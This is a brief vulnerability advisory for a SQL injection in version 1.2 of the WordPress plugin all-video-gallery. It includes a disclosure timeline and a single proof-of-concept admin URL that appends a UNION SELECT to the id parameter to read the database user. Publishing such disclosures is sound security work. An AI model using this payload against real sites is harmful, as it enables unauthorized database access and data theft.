Plugin Details
Plugin Name: wp-plugin : all-video-gallery
Effected Version : 1.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
-
December 25, 2013: Vendor Contacted
- May 28, 2014 : Public Disclosure
Technical Details
<http://localhost/wp-admin/admin.php?page=allvideogallery_videos&opt=edit&id=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18>
Although Version 1.2 was released to fix simmilar issues however this perticular instance was not fixed considering to the fact that this interface is only accessible to administrator.